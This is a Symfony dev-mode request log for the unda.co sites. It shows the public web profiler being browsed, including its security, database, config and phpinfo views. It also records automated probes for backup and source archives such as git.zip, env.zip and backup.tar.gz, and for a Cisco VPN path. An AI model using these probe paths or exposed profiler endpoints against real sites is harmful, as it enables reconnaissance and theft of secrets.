[2025-12-17 14:32:13] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 14:32:14] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 14:39:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=security","method":"GET"} []
[2025-12-17 14:39:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 14:47:06] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 14:49:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=security","method":"GET"} []
[2025-12-17 14:49:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 14:49:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f6e651","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f6e651?panel=db","method":"GET"} []
[2025-12-17 14:49:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-17 14:49:36] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"9b10ec","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/9b10ec/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-17 14:49:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-17 14:49:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=189.172.45.61&limit=10&method=GET","method":"GET"} []
[2025-12-17 14:49:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.45.61&limit=10&method=GET","method":"GET"} []
[2025-12-17 14:50:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5e3cf1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5e3cf1?panel=cache","method":"GET"} []
[2025-12-17 14:50:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 14:55:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"703e75","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/703e75?panel=cache","method":"GET"} []
[2025-12-17 14:55:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 14:56:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"cdd835","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/cdd835/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-17 14:56:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-17 14:56:52] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 14:58:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=request","method":"GET"} []
[2025-12-17 14:58:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 15:00:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c61e5e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c61e5e?panel=request","method":"GET"} []
[2025-12-17 15:00:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 15:02:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=router","method":"GET"} []
[2025-12-17 15:02:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-17 15:03:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:05:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:05:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 15:05:56] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 15:06:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=config","method":"GET"} []
[2025-12-17 15:06:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 15:07:55] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-17 15:14:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?panel=security","method":"GET"} []
[2025-12-17 15:14:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 15:15:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=cache","method":"GET"} []
[2025-12-17 15:15:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 15:16:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.82.133&limit=10&method=POST","method":"GET"} []
[2025-12-17 15:16:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.82.133&limit=10&method=POST","method":"GET"} []
[2025-12-17 15:19:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 15:19:02] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 15:21:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"822e44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/822e44?panel=security","method":"GET"} []
[2025-12-17 15:21:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 15:23:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=44.192.15.107&limit=10","method":"GET"} []
[2025-12-17 15:23:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=44.192.15.107&limit=10","method":"GET"} []
[2025-12-17 15:23:35] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 15:23:35] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 15:23:36] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 15:23:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757","method":"GET"} []
[2025-12-17 15:23:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 15:24:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"12dd43","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/12dd43?panel=cache","method":"GET"} []
[2025-12-17 15:24:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 15:26:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b9ec1c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b9ec1c","method":"GET"} []
[2025-12-17 15:26:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 15:32:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=twig","method":"GET"} []
[2025-12-17 15:32:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 15:33:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:33:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:34:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2bf974","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2bf974?panel=time","method":"GET"} []
[2025-12-17 15:34:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 15:36:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:36:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:40:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 15:40:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
